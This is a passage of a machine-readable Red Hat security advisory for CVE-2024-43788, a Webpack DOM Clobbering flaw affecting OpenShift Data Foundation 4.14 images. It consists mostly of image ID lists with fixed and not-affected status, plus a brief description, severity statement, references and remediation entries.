"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", 